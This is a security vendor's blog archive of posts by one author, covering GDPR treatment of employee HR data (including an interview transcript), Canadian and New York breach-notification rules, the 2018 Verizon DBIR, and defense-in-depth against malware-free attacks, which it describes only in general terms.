All posts by Andy Green

[Transcript] Attorney Sara Jodka on the GDPR and HR Data

[Transcript] Attorney Sara Jodka on the GDPR and HR Data

In reviewing the transcript of my interview with Sara Jodka, I realize again how much great information she freely dispensed. Thanks Sara! The employee-employer relationship under the GDPR is a confusing area. It might be helpful to clarify a few points Sara made in our conversation about the legitimate interest exception to consent, and the threshold for Data Protection Impact Assessments (DPIAs).

The core problem is that to process personal data under the GDPR you need to have freely-given consent. If you can’t get that, you have a few other options, which are covered in the GDPR’s Article 6.  For employees, consent can not be given freely, and so employers will most likely need to rely on “legitimate interest” exception referred to in that article.

There’s a little bit of paperwork required to prove that the employer’s interest overrides the employee’s rights. In addition, employers will have to notify the employees as to what data is being processed. Sara refers to the ICO, the UK’s data protection authority, and they have an informal guidance, which is worth reading, on the legitimate interest process.

Since the data collected by the employer is also from a vulnerable subject (the employee) and contains a special class of sensitive personal data (health, payroll, union membership, etc.), it meets the threshold set by GDPR regulators — see this guidance — for performing a DPIA. As we know, DPIAs require companies to conduct a formal risk analysis of their data and document it.

Sara reminds us that some US companies, particularly service-oriented firms, may be surprised to learn about the additional work they’ll need to undertake in order to comply with the GDPR. In short: employees, like consumers, are under the new EU law.


Inside Out Security: Sara Jodka is an attorney with Dickenson Wright in Columbus, Ohio. Her practice covers data privacy and cyber security issues. Sara has guided businesses through compliance matters involving HIPPA, Gramm-Leach-Bliley, FERPA, and COPPA, and most importantly for this podcast, certification under the US-EU Privacy Shield, which, of course, falls under the General Data Protection Regulation or GDPR.

A lot of abbreviations there! Welcome, Sara.

Sara Jodka: Thank you for having me.

IOS: I wanted to get into an article that you had posted on your law firm’s blog. It points out an interesting subcategory of GDPR personal data which doesn’t get a lot of attention, and that is employee HR records. You know, of course it’s going to include ethnic, payroll, 401(k), and other information.

So can you tell us, at a high level, how the GDPR treats employee data held by companies?

Employee Data Covered By the GDPR

SJ: Whenever we look at GDPR, there are 99 articles, and they’re very broad. There’s not a lot of detail on the GDPR regulations themselves. In fact, we only have one that actually carves employment data out, and that’s Article 88  — there’s one in and of itself.

Whenever we’re looking at it, none of the articles say that all of these people have these rights. All these individuals have rights! None of them say, “Well, these don’t apply in an employment situation.” So we don’t have any exclusions!

We’re led to “Yes, they do apply.” And so we’ve been waiting on, and we have been working with guidances that we’re receiving, you know, from the ICO, with respect to ….  consent obligation, notice obligation, portability requirements, and  any employee context. Because it is going to be a different type of relationship than the consumer relationship!

IOS: It’s kind of interesting that people, I think, or businesses, probably are not aware of this … except those who are in the HR business.

So I think there’s an interesting group of US companies that would find themselves under these GDPR rules that probably would not have initially thought they were in this category because they don’t collect consumer data. I’m thinking of law firms, investment banking, engineering, professional companies.

US Professional Service Companies Beware!

SJ: I think that’s a very good point! In fact, that’s where a lot of my work is actually coming from. A lot of the GDPR compliance is coming from EU firms that specialize with EU privacy. But a lot of U.S. companies didn’t realize that this is going to cover their employment aspects that they had with EU employees that are in the EU!

They thought, “Well, because we don’t actually have a physical location EU, it doesn’t actually cover us.” That’s not actually at all true.
The GDPR covers people that are working in the EU, people who reside in the EU, so to the extent that U.S. company has employees that are working in the EU it is going to cover that type of employee data. And there’s no exception in the GDPR around it. So it’s going to include those employees.

IOS: So I hadn’t even thought about that. So their records would be covered under the GDPR?

SJ: Yeah, the one thing about the definition of a data subject under the GDPR is it doesn’t identify that it has to be an EU resident or it has to be an EU citizen. It’s just someone in the EU.

When you’re there, you have these certain rights that are guaranteed. And that will cover employees that are working for U.S. companies but they’re working in the EU.

IOS: Right.  And I’m thinking perhaps of a U.S. citizens who come there for some assignment, and maybe working out of the office, they would be covered under these rules.

SJ: And that’s definitely a possibility, and that’s one thing that we’ve been looking for. We’ve been looking for looking for guidance from the ICO to determine …  the scope of what this is going to look not only in an employment situation, but we’re dealing with an immigration situation, somebody on a work visa, and also in the context of schools as we are having, you know, different students coming over to the United States or going abroad. And what protection then the GDPR applies to those kind of in-transition relationships, those employees or students.

With a lot of my clients, we are trying to err on the side of caution and so do things ahead of time, rather than beg forgiveness if the authorities come knocking at our door.

GDPR’s Legitimate Interest Exception is Tricky

IOS: I agree that’s probably a better policy, and that’s something we recommend in dealing with any of these compliance standards.

In that article, you mentioned that the processing of HR records has additional protections under the GDPR …  An employee has to give explicit or consent freely and not as part of an employer-employee contract.

GDPR’s Article 6 says there are only six lawful ways to process data. If you don’t obtain freely given consent, then it gets tricky.

Can you explain this? And then, what does an employer have to do to process employee data  especially HR data?

SJ: Well, when we’re looking at the reasons that we’re allowed to process data, we can do it by consent, and we can also do it if we have a lawful basis.

A number of the lawful bases are going to apply in the employer context. One of those is if there is going to be an agreement. You know, in order to comply with the terms of a contract, like a collective bargaining agreement or like an employment agreement. So hire/fire payroll data would be covered under that, also if there is … a vital interest of an employee.

There’s speculation that that exception might actually be, or that legitimate basis might be used to obtain vital information regarding, like, emergency contact information of employees.

And there’s also one of the other lawful basis is if the employer has a greater, you know, interest in the data that doesn’t outweigh the right of the data subject, the employee.

The issue though is most … when we talk about is consumer data, and we’re looking a lot at consent and what actually consent looks like in terms of the express consent, you know, having them, you know, check the box or whatever.

In an employee situation, the [UK’s] ICO has come out with guidance with respect to this. And they have expressly said in an employee-employer relationship, there is an inherent imbalance of bargaining power, meaning an employee can never really consent to giving up their information because they have no bargaining power. They either turn it over, or they’re not employed. The employer is left to rely only on the other lawful basis to process data, excluding consent, so the contractor allowance and some of the others.

But the issue I have with that is, I don’t think that that’s going to cover all the data that we actually collect on an employee, especially employees who are operating outside the scope of a collective bargaining agreement.

In a context of, say, an at-will employee where there is that … where that contract exception doesn’t actually apply. I think there will be a lot of collection of data that doesn’t actually fall under that. It may fall into the legitimate interest, if the employer has the forethought to actually do what’s required, which is to actually document the process of weighing the employer’s interest against the interest of the employee, and making sure that that is a documented process. [ Read the UK’s ICO guidelines on the process of working out legitimate interest.]

When employers claim a legitimate interest exception to getting employee consent, they have more work to do. [Source: UK ICO]

But also what comes with that is the notice requirement, and the notice requirement is something that can be waived. So employers, if they are doing that, are going to have to  — and this is basically going to cover every single employer — they’re going to have to give their employees notice of the data that they are collecting on them, at a minimum.

IOS: At a minimum. I think to summarize what you’re saying is it’s just so tricky or difficult to get what they call freely given consent, that most employers will rely on legitimate interest.

Triggers for Data Protection Impact Assessments (DPIAs)

IOS: In the second part of this interview, we joined Sara Jodka as she explains what triggers a data protection impact assessment, or DPIA when processing employee data.

SJ: I think that’s required when we’re doing requirements for sensitive data, and we’re talking about sensitive HR data. A DPIA has be performed when two of the following exist, and there’s like nine things that have to be  there in order for a DPIA to have to be done. But you bring up a great point because the information that an employer is going to have is going to necessarily trigger the DPIA. [See these Working Part 29 guidelines for the nine criteria that Sara refers to]

The DPIA isn’t triggered by us doing the legitimate basis …
and having to document that process. It’s actually triggered because we process sensitive data. You know, their trade union organization, affiliation, their religious data, their ethnicity. We have sensitive information, which is one of the nine things that can trigger, and all you need is two to require a DPIA.

Another one that employers always get is they process data of a vulnerable data subject. A vulnerable data subject includes employees.

IOS: Okay. Right.

SJ:  I can’t imagine a situation where an employer wouldn’t have to do a DPIA. The DPIA is different than the legitimate interest outweighing [employee rights] documentation that has to be done. They’re two different things.


IOS: So, they will have to do the DPIAs? And what would that involve?

SJ: Well, it’s one thing that’s required for high-risk data processing and that, as we just discussed, includes the data that employer has.

Essentially what a DPIA is, it’s a process that is designed to describe what processing the employer has, assess the necessity on proportionality to help manage the risk to the rights and the freedoms of the national persons resulting from the processing of personal data by assessing and determining the measures to address the data and the protections around it.

It’s a living document, so one thing to keep in mind about DPIA is they’re never done. They are going to be your corporation’s living document of the high-risk data you have and what’s happening with it to help you create tools for accountability and to comply with the GDPR requirements including, you know, notice to data subject, their rights, and then enforcing those rights.

It’s basically a tracking document … of the data, where the data’s going, where the data lives, and what happens with the data and then what happens when somebody asks for their data, wants to erase their data, etc.

GDPR Surprises for US Companies

IOS: Obviously, these are very tricky things and you definitely need an attorney to help you with it. So, can you comment on any other surprises U.S. companies might be facing with GDPR?

SJ: I think one of the most interesting points, whenever I was doing my research, to really drill down, from my knowledge level, is you’re allowed to process data so long as it’s compliant with a law. You know, there’s a legal necessity to do it.

And a lot of employers, U.S employers specifically, look at this and thought, “Great, that legal requirement takes the load off of me because I need, you know, payroll records to comply with the Fair Labor Standards Act and, you know, state wage laws. I need my immigration information to comply with the immigration control format.”

You know, they were like, “We have all these U.S. laws of why we have to retain .information and why we have to collect it.” Those laws don’t count, and I think that’s a big shock when I say, well, those laws don’t count.

We can’t rely on U.S. laws to process EU data!

We can only rely on EU laws and that’s one thing that’s brought up and kind of coincides with Article 88, which I think is an interesting thing.

If you look at Article 88 when they’re talking about employee data, what Article 88 does is it actually allows member states to provide for more specific rules to ensure that the protections and the freedoms of their data are protected.

These member states may be adding on more laws and more rights than the GDPR already complies! Another thing is, not only do we have to comply with an EU law, but we also are going to comply with member states, other specific laws that may be more narrow than the GDPR.

Employers can’t just look at the GDPR, they’re going to also have to look at if they know where a specific person is. Whether it’s Germany or Poland. They’re going to have to look and see what aspects of the GDPR are there and then what additional, more specific laws that member state may have also put into effect.

Interviewer: Right!

SJ: So, I think that there are two big legal issues hanging out there that U.S. multinational companies…

IOS: One thing that comes to my mind is that there are fines involved when not complying to this. And that includes, of course, doing these DPIAs.

SJ: The fines are significant. I think that’s the easiest way to put it is that the fines are, they’re astronomical, I mean, they’re not fines that we’re used to seeing so there’s two levels of fines depending on the violation. And they can be up to a company’s 4% of their annual global turnover. Or 20 million Euros.  If you’d look at it in U.S. dollar terms, you’re looking at, like, $23 million at this point.

For some companies that could be, that’s a game changer, that’s a company shut down. Some companies can withstand that, but some can’t. And I think any time you’re facing a $23 million penalty, the cost of compliance is probably going to weigh out the potential penalty.

Especially because these aren’t necessarily one-time penalties and there’s nothing that’s going to stop the Data Protection Authority from coming back on you and reviewing again and assessing another penalty if you aren’t in compliance and you’ve already been fined once.
I think the issue is going to be how far the reach is going to be for U.S. companies. I think for U.S. companies that have, you know, brick and mortar operations in a specific member state, I think enforcement is going to  be a lot easier for the DPA.

There’s going be a greater disadvantage to, actually, enforcement for, you know, U.S. companies that only operate in U.S. soil.

Now, if they have employees that are located in the EU, I think that enforcement is going to be a little bit easier, but if they don’t and they’re merely just, you know, attracting business via their website or whatever to EU, I think enforcement is gonna be a little bit more difficult, so it’s going to be interesting to see how enforcement actually plays out.

IOS: Yeah, I think you’re referring to the territorial scope aspects of the GDPR. Which, yeah, I agree that’s kind of interesting.

SJ: I guess my parting advice is this isn’t something that’s easy, it’s something that you do need to speak to an attorney. If you think that it may cover you at all, it’s at least worth a conversation. And I’ve had a lot of those conversations that have lasted, you know, a half an hour, and we’ve been very easily able to determine that GDPR is not going to cover the U.S. entity.

And we don’t have to worry about it. And some we’ve been able to identify that the GDPR is going to touch very slightly and we’re taking eight steps, you know, with the website and, you know, with, you know, on site hard copy documents to make sure that proper consent and notice is given in those documents.

So, sometimes it’s not going be the earth-shattering compliance overhaul of a corporation that you think the GDPR may entail, but it’s worth a call with a GDPR attorney to at least find out so that you can at least sleep better at night because this is a significant regulation, it’s a significant piece of law, and it is going to touch a lot of U.S. operations.

IOS: Right. Well, I want to thank you for talking about this somewhat under-looked area of the GDPR.

SJ: Thank you for having me.

Adventures in Malware-Free Hacking: Closing Thoughts

Adventures in Malware-Free Hacking: Closing Thoughts

I think we can all agree that hackers have a lot of tricks and techniques to sneakily enter your IT infrastructure and remain undetected while they steal the digital goodies. The key takeaway from this series is that signature-based detection of malware is easily nullified by even low-tech approaches, some of which I presented.

I’m very aware that prominent security researchers are now calling virus scanners useless, but don’t throw them out just yet! There’s still a lot of mint-condition legacy malware on the Intertoobz used by lazy hackers that would be blocked by these scanners.

A better philosophy in dealing with file-less malware and stealthy post-exploitation techniques is to supplement standard perimeter defenses, port scanners, and malware detectors with secondary lines of defense, and have strategies in place when the inevitable happens — including a breach response program.

I’m referring to, wait for it, defense-in-depth (DiD). This is a very practical approach to dealing with smart hackers who sneer at perimeter defenses, and mock signature scanning software.

Does DiD have its own problems? Sure. Those same security pros who have lost faith in traditional security measures are now promoting whitelisting of applications, which can be a very strong inner wall to protect against an initial breach.

But the code-free techniques I showed in this series can be used to even get around whitelisting. This falls under a new hacking trend called “living off the land”, which subverts legitimate tools and software for evil purposes. In the next few weeks, I’ll post a mini-tutorial on lol-ware. For those who want to do their homework ahead of time, start perusing this interesting github resource. Stay tuned.

Q: Can you get around Windows security protections by sneaking forbidden commands into regsvr32.exe? A: Yes, next question.

Get Real About Data Security!

In my view, defense-in-depth is about minimizing liabilities: taking what could be a potential catastrophe and transforming it into something that’s not too terrible or costs too much.

The hacker got in, but because of your company’s excellent and restrictive permission policies, you prevented her from gaining access to sensitive data.

Or the hackers have obtained access to the sensitive data, but your awesome user-behavior analytics technology has spotted the intruders and disabled the accounts before a million credit cards could be exfiltrated.

Or perhaps the hacker has managed to find and exfiltrate a file of email addresses. However, your outstanding breach response program, which includes having near real-time information on abnormal file activities, enables you to contact the appropriate regulators (and customers affected) in near record time with detailed information on the incident, thereby letting you avoid fines and bad publicity.

Common Sense Defense Advice

Defense-in-depth is more of a mind-set and philosophy, but there are, some practical steps to take and, ahem, great solutions available to make it easier to implement.

If I had to take the defense-in-depth approach and turn it into three actionable bullet points, here’s what I would say:

  • Assess. Evaluate your data risks by taking an inventory of what you need to protect. Identify PII and other sensitive data, some of which can be under regulations, and is often scattered across huge file system. You need to work out who has access to it and who really should have access to it. Warning: this ain’t easy to do, unless you have some help.
  • Defend. Now that you’ve found the data, limit the potential damage of future breaches by locking it down: reduce broad and global access, and simplify permission structures – avoid one-off ACLs and use group objects. Minimize the overall potential risk by retiring stale data or other data that no longer serves its original function.
  • Sustain. Maintain a secure state by automating authorization workflows, entitlement reviews, and the retention and disposition of data. And finally, monitor for unusual user and system behaviors.

Need to make your defense in depth dream a reality? Learn how we can help.

[Podcast] Attorney Sara Jodka on the GDPR and HR Data, Part II

[Podcast] Attorney Sara Jodka on the GDPR and HR Data, Part II


Leave a review for our podcast & we'll send you a pack of infosec cards.

In the second part of my interview with Dickinson Wright’s Sara Jodka, we go deeper into some of the consequences of internal employee data. Under the GDPR, companies will likely have to take an additional step before they can process this data: employers will have to perform a Data Protection Impact Assessment (DPIA).

As Sara explained in the first podcast, internal employee data is covered by the GDPR — all of the new law’s requirements still apply. This means conducting a DPIA when dealing with certain classes of data, which as we’ll learn in the podcast, includes HR data. DPIAs involve analyzing the data that’s being processed, assessing the risks involved, and putting in place the security measures to protect the data.

Last April, the EU regulators released a guidance on the DPIA, covering more of the details of what triggers this extra work. Legal wonks can review and learn about the nine criterion related to launching a DPIA.  Because HR data processing touches on two of the triggers — vulnerable subjects (employees) and sensitive data (HR) — it crosses the threshold set by the regulators.

Listen to Sara explain it all, and if you’re still not satisfied, have your in-house counsel review the regulator’s legalese contained in the EU guidance.

Continue reading the next post in "[Podcast] Attorney Sarah Jodka on the GDPR and HR Data"

[Podcast] Attorney Sara Jodka on the GDPR and Employee HR Data, Part I

[Podcast] Attorney Sara Jodka on the GDPR and Employee HR Data, Part I


Leave a review for our podcast & we'll send you a pack of infosec cards.

In this first part of my interview with Dickinson Wright attorney Sara Jodka, we start a discussion of how the EU General Data Protection Regulation (GDPR) treats employee data. Surprisingly, this turns out to be a tricky area of the new law. I can sum up my talk with her, which is based heavily on Jodka’s very readable legal article on this overlooked topic, as follows: darnit, employees are people too!

It may come as a surprise to some that the GDPR protects all “natural persons” in the EU. Employees, even non-citizen EU employees, are all completely natural, organic people under the GDPR. Their name, address, payroll, personal contacts, and in particular, sensitive ethnic or health data fall under the GDPR. So IT security groups will need to have all the standard GDPR security policies and procedures in place for employee data files — for example, minimize access to authorized users, set retention limits, and detect breaches.

The tricky part comes in getting “freely given” consent from employees. Listen to the podcast to learn how most EU employers will need to claim “legitimate interest” as away to process employee data without explicit consent. This will lead to some additional administrative overhead for employers, who will have to prove their interests override the employees’ privacy and notify employees of what’s being done to the data.

As we’ll learn in the second part of the podcast, because employee data often contains sensitive data as well, employers will also have to conduct a Data Protection Impact Assessment (DPIA), which will require even more work.

Bottom line: US service-based companies in the EU — financial, legal, professional services — who thought they escaped from the GDPR’s reach because they didn’t collect consumer data are very much mistaken.

Sara explains it all.

Continue reading the next post in "[Podcast] Attorney Sarah Jodka on the GDPR and HR Data"

Canada’s PIPEDA Breach Notification Regulations Are Finalized!

Canada’s PIPEDA Breach Notification Regulations Are Finalized!

While the US — post-Target, post-Sony, post-OPM, post-Equifax — still doesn’t have a national data security law, things are different north of the border. Canada, like the rest of the word, has a broad consumer data security and privacy law, which is known as the Personal Information Protection and Electronic Documents Act (PIPEDA).

For nitpickers, there are also overriding data laws at the provincial level — Alberta and British Columbia’s PIPA — that effectively mirror PIPEDA.

Data Security and Privacy: It’s Better In Canada With PIPEDA

In any case, PIPEDA is a consumer-friendly law that’s based on Canadian-born Privacy by Design (PbD) principles. The law has privacy rules requiring consumer consent when collecting personal information and giving consumers the right to access and change their data when incorrect. And companies are obligated to put in place security safeguards and practices, such as data minimization, to limit risks and protect their data. Not surprisingly, PIPEDA is also similar to another PbD- inspired law, the EU GDPR.

Like the GDPR, PIPEDA’s definition of personal information is quite broad: it includes any data about an individual. Along with name, and other obvious identifiers, PIPEDA counts as personal information employee files, credit records, medical records, blood type, social status, and more.

Breach reporting must-haves as spelled out in the new regulation.

In June 2015, the Digital Privacy Act amended PIPEDA to include breach notification requirements. The Act defines a “breach of security safeguards” as a loss or unauthorized access or disclosure of personal information resulting from a breach of the organization’s security safeguards.

Those of you who’ve been following along with our coverage of various breach notification laws know that the use of “or” above is significant. In short: a breach can involve unauthorized access alone without disclosure, and that means hacking into systems and touching personal information counts as a breach. And in particular, a ransomware attack would be considered a breach under PIPEDA.

Under PIPEDA, organizations are required to notify affected the Privacy Commissioner of Canada and affected individuals “as soon as feasible” when there is a breach that creates a “real risk of significant harm” — which can include mere reputational harm — to an individual. It also requires them to record a record of each breach of safeguards involving personal information, regardless of whether the breach results in a risk of significant harm.

With the breach notification law passed, Canadians had to wait for the Canadian government to finalize the nitty gritty details in new regulations yet to be written, and to set a date for the rules to go into effect. And wait.

PIPEDA’s Breach Notification Rule Goes Into Effect (in November)

A mere three years later, the government finally released the fine print of the regulation in January. If you’re truly interested, you can read the details here (skip past all the regulations on fisheries to page 149).

I scanned this riveting legal prose, so I can save you some time. If after analysis of an incident, it’s decided the breach will cause significant harm, the regulatory authority and the individuals affected will have to be notified with the breach details, including a description of the incident, the personal information accessed or taken, and what the company is doing about the breach (see the above legale-ese from the regulation).

But even if the risk to the affected individuals doesn’t merit a notification, the company still has to record basic information about the breach and retain if for 24-months.

These breach reporting rules will go into effect on November 1, 2018.

Varonis and PIPEDA

As with the GDPR and many other data security and privacy laws, Varonis can also help you comply with PIPEDA. You can learn more about how we support its key principles here.

For the new breach notification rules, our DatAlert product can monitor sensitive personal information and alert IT when this data is accessed, modified, or copied in an abnormal way. More specifically, our UBA threat models can catch ransomware as it accesses and encrypts files.

Want to lean more about how Varonis helps with breach monitoring and reporting? Ask for a free demo today!




Another GDPR Gotcha: HR and Employee Data

Another GDPR Gotcha: HR and Employee Data

Have I mentioned recently that if you’re following the usual data security standards (NIST, CIS Critical Security Controls, PCI DSS, ISO 27001) or common sense infosec principles (PbD), you shouldn’t have to expend much effort to comply with the General Data Protection Regulation (GDPR)? I still stand by this claim.

Sure there are some GDPR requirements, such as the 72-hour breach notification, which will require special technology sauce.

There’s also plenty of fine print that will keep CPOs, CISOs, and outside legal counsels busy for the next few years.

US Professional Service Companies Beware!

One of those fine points is how the GDPR deals with employee records. I’m talking about human resource’s employee files, which can cover, besides all the usual identifiers (name, address and photos), personal details such as health, financial, employee reviews, family contact information, and more.

EU-based companies and US companies that have been doing business in the EU have long had to deal with Europe’s stricter national laws about employee data.

The GDPR holds a surprise for US companies that are not consumer-oriented and thought that the new law’s tighter security and privacy protections didn’t cover them. In fact, they do.

I’m referring particularly to US financial, legal, accounting, engineering, and other companies providing B2B services that are not in the business of collecting consumer data.

Let me just say it: the GDPR considers employee records to be personal data — that’s GDPR-ese for what we in the US call PII.  And companies that have personal data of employees – and who doesn’t – will have to comply with the GDPR even if they don’t have consumer data.

So if a US accounting firm in the EU has a data breach involving the theft of employee records, then it would have to notify the local supervisory authority within the 72-hour window.

There’s another surprise for US companies. Even if they don’t have a physical presence in the EU but still have employees there — say French or Italian workers are telecommuting — then their employee records would also be covered by the GDPR.

Employees Have Data Privacy Rights

And that also means, with some restrictions, that employees gain privacy rights over their data: they can request, just as a consumers do, access to their personnel files, and have the right to correct errors.

There’s even an employee “right to be forgotten”, but only when the data is no longer necessary for the “purposes for which it was collected”. Obviously, employers have a wide claim to employee data so it’s easy to see that most employee file are protected from being deleted on demand.

But no doubt they’ll be instances where the “right to be forgotten” rule makes sense. Perhaps a vice president of marketing makes a request to HR to take a one-month leave of absence to study bird life in Costa Rica, has second thoughts, and then asks HR to delete the initial application based on his GDPR rights.

More importantly, employees also have the right to consent to the processing of their data. This particular right is not nearly as straightforward as it is for consumers.

Since employee privacy rights under the GDPR are far from simple, law firms and attorneys are filling the Intertoobz with articles on this subject, especially on the consent to processing loopholes.

As it happens, I came across one written by Sara Jodka, an attorney for Columbus-based Dickinson Wright, that is mercifully clear and understandable by non-attorney life forms.

The DPIA Surprise

The key point that Jodka makes is that since employers have leverage over employees, it’s hard to for the consent to processing to be “freely given”, which is what the GDPR requires.

Typically, an employee has given consent to processing of her data as part of an employment contact. But since the employee likely had no choice but to sign the contract in order to get the job, the GDPR does not consider this freely given.

So how do employers deal with this?

There is an exception that the GPDR makes: if the employer has “legitimate interests”, then consent is not needed. To prove legitimate interest, the company will have to document why its right to the data outweighs the employee’s privacy rights. Essentially, in the one-sided employer-employee relationship, the employer has the burden of proving it needs the data since consent is not generally required.

Though there are some different legal opinions on  the types of employee data covered by legitimate interests, sensitive data involved with monitoring of employee computer usage, their location, or perhaps event their travel plans will definitely require employers to take an extra step.

They will have to perform a Data Protection Impact Assessment or DPIA.

On the IOS blog, we’ve been writing about DPIAs for quite a while. It’s required for the processing of sensitive data, such as racial, ethnic, or health-related. Employee records that contain this information as well as monitoring data will fall under the DPIA rule, which is spelled out in article 35.

In short: companies using the legitimate interest exception for processing employee records will likely also be conducting data assessments that include analyzing the processing, evaluating the security risks involved, and proposing measures to protect the data.

If you’re finding this a little confusing, you are not alone. However, help is on the way!

I interviewed Sara Jodka earlier this week, and she brilliantly explained the subtleties involved in protecting employee records under the GDPR, and has some great advice for US companies .

Stay tuned. I’m hoping to get the first part of the podcast up next week.

Verizon 2018 DBIR: Phishing, Stolen Passwords, and Other Cheap Tricks

Verizon 2018 DBIR: Phishing, Stolen Passwords, and Other Cheap Tricks

Like the rest of the IT security world last week, I had to stop everything I was doing to delve into the latest Verizon Data Breach Investigations Report. I spent some quality time with the 2018 DBIR (after drinking a few espresso), and I can sum it all up in one short paragraph.

Last year, companies faced financially driven hackers and insiders, who use malware, stolen credentials, or phishing as attack vectors. They get in quickly and then remove payment card information, PII, and other sensitive data. It often takes IT staff months to even discover there’s been a breach.

I just played a trick on you.

The above paragraph was taken word for word from my analysis of the 2016 DBIR. Depressingly, this same analysis applies to the 2018 DBIR and has been pretty spot on for the law few years of Verizon reports.

Swiss Cheese

The point is that hackers have found a very comfortable gig that’s hard to defend against.  According to this year’s DBIR, stolen credential and phishing take up the first and third slots in the report table of top 20 actions in breaches. (RAM scrapers, by the way, are in the 2nd position and used heavily in POS attacks.)

How big a problem are stolen credentials, user names and passwords, which were previously hacked from other sites?

In a post late last year, Brian Krebs explored the dark market in hot passwords. A hacker can buy a vanilla user name and password combination for around $15. But the price goes up for active accounts of military personnel to $60, and tops out to $150 for active credentials from an online electronics retailers.

Let’s face it, credential are relatively inexpensive, and, as it turns out, they are also plentiful. A study by Google puts the number of credentials available on the black market at almost two billion.

Obviously, this is very bad news. Until we have wider use of multi-factor authentication, hackers can get around perimeter defenses to harvest even more credentials and other personal data and then sell them back to the blackmarket. In other words, there’s an entire dark economy at work to make it all happen.

And if hacker don’t have the cash to buy credentials in bulk, they can use phishing techniques to get through the digital door. There is a small ray of hope about phishing: the DBIR says that 80% of employee never click. Of course, the bad news is that 20% will.

Dr. Zinaida Benenson, our go-to expert on phishing, reported a similar percentage of clickers in her phishing experiments (which we wrote about last year): anywhere between 20% to 50% clicked, depending on how the messages was framed.

It only takes one employee to take the bait for the hackers to get in. You can run your own Probability-101 calculation, as I did here, to discover that with near certainty a good phish mail campaign will succeed in placing a malware payload on a computer.

In short: standard perimeter security defenses protecting against phishing attacks or hackers using stolen or weak credentials begin to resemble a beloved dairy product from a mountainous European country.

Scripty Malware

According to the DBIR, phish mail is the primary way malware enters an organization: their stats say it carries the hackers’ evil software over 90% of the time. Hackers don’t have to waste time finding openings in websites using injection attacks or other techniques: phishing is very effective and easier to pull off.

This year’s DBIR also has some interesting insights (see below) into the format of the malware that eventually lands inside the organization. The hackers are using scriptware — either JavaScript or VBScript —far more than binaries.

Source: Verizon 2018 DBIR

And it makes sense! It’s incredibly simple to write these scripts — this non-technical blogger could do it — and make them appear as, say, clickable PDF files in the case of JS of VBS, or insert a VBA script directly into a Word or Excel doc that will execute on opening.

You can learn about these malware-free techniques by reading my epic series of posts on this topic.

The attackers can also cleverly leverage the built-in script environments found in Microsoft Office. There’s even a completely no-sweat code-free approach that takes advantage of Microsoft Word’s DDE function used in embedded fields — I wrote about it here.

Typically, this initial payload allows the hackers to get a foot in the door, and it’s evil purpose is to then download more sophisticated software. The malware-free series, by the way, has real-world samples that show how this is done. Feel free to study them.

To quickly summarize: the MS Office scriptware involves launching a PowerShell session and then using the WebClient command to download the next stage of the attack over an HTTP channel.

Needless to say, the malware-free techniques – Office scripts, PowerShell, HTTP —are very hard to detect using standard security monitoring tools. The scripts themselves are heavily obfuscated — see the PowerShell obfuscation series to understand the full impact — and are regularly tweaked so defenses that rely on scanning for specific keywords or calculating hashes are useless.

The Verizon 2018 DBIR validates what I’m saying. Their stats indicate that 70-90% of malware samples are unique to an organization. Or as they put it:

… basically boil down to “AV is dead.” Except it’s not really. Various forms of AV, from gateway to host, are still alive and quarantining nasty stuff every day. “Signatures alone are dead” is a much more appropriate mantra that reinforces the need for smarter and adaptive approaches to combating today’s highly varied malware.

Towards a Better 2018

If you’ve been paying attention, then not too much of what the Verizon DBIR is saying should come as a shock. However, I do encourage you to read the introductory summary and then skip down to the industry vertical section to get more specifics relevant to your situation — mileage does vary. For example, ransomware is rampant in healthcare, and Remote Access Trojans (RATS) are more prevalent in banking.

And now for my brief sermon on what to do about the DBIR’s bleak statistics.

Perimeter defense are not effective in keeping hackers out. You need them, just as you need locks on windows and doors, but the hackers have found simple and cheap methods to get around these security measures.

To make 2018 a better security year, your first step is to admit that expensive firewalls and scanner infrastructure won’t solve everything — admit it right now, take a huge weight off your shoulders, and feel better! — and so secondary defenses have to be in place.

This means finding and putting more restrictive access rights on your sensitive data files to limit what the hackers can potentially discover, and then using monitoring techniques that alert your security teams if the attackers access these files.

Want to move beyond perimeter security? Click here to request a free risk assessment today!

SHIELD Act Will Update New York State’s Breach Notification Law

SHIELD Act Will Update New York State’s Breach Notification Law

Those of you who have waded through our posts on US state breach notification laws know that there are few very states with rules that reflect our current tech realities. By this I mean there are only a handful that consider personally identifiable information (PII) to include internet-era identifiers, such as email addresses and passwords. And even fewer that would require a notification to state regulators when a ransomware attack occur.

Access Alone, or Access and Acquire, That is the Question!

Remember the loophole in state breach laws with respect to ransomware?

Just about all state notification laws define a breach to be unauthorized access and acquisition. Since ransomware merely accesses the data — it encrypts it — without copying or exfilitrating, such an attack would not have to be reported under that definition.

I’ve been able to find only three states — though there may more lurking— that consider a breach to be either access or acquisition: New Jersey, Connecticut, and, most recently, North Carolina.

But late last year, New York began making a bid to join this elite club. The NY Attorney General Eric Schneiderman proposed the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act) to “close major gaps in New York’s data security laws, without putting an undue burden on businesses.”

NY’s SHIELD — love that abbreviation — will update the state’s legal definition of a breach to use the “or” word, thereby closing the ransomware gap.

By the way, if you’re wondering whether other federal and international data security laws have ransomware loopholes — they do! — and breach notification legalese brings out your inner attorney, you’ll love our in-depth white paper on this very subject.

Anyway, the AG also proposes to tweak the state’s current PII definition to now encompass user name or email address (along with a password), biometric data, and even HIPAA-style protected health information or PHI.

NYS Senate Bill S6933A: Access to OR acquisition. Go that?

The Data Empire State

Those who love the wonky details can peruse the SHIELD Act here and review all the changes it will make to the current legal language on the books.

SHIELD will also require something new as well: companies will need “reasonable administrative, technical, and physical safeguards for sensitive data”— the standard boilerplate that we see in many federal laws. This is as non-prescriptive as it gets, so for now this mostly serves as a warning to companies to have some minimal security policies and procedures in place.

SHIELD is just a legislative proposal at this point, and has yet to be finalized and passed by the legislature. We still have a long way to go. But once that happens, I expect we’ll get additional guidance on some of the law’s nuances from the state. We’ll keep you posted.

I’d like to point out that the SHIELD Act covers any company that does business in NYS. This means that it does have a GDPR-like extended territorial scope aspect to it — in this case, the law crosses state boundaries. In other words, if a California-based e-commerce company collects data from NYS residents, then they would be covered by SHIELD, and would have to report, for example, an exposure or access of PII to NYS authorities.

Yeah, there’s some legal questions about whether NYS can assert jurisdiction in other states.

One last wonky point: New York State’s other data security law, its Department of Financial Services (NYSDFS) own cyber regulations, covers banks and financial companies. It also has breach notifications rules, which we wrote about here.

In short: New York’s financial companies are covered by the NYSDFS regs; for everyone else, the SHIELD Act will apply.

With all this data security legal innovation, New York is at the forefront among states in protecting data and setting a bar — although initially low — for security practices for anyone doing business in the Empire State.

Varonis Perspective

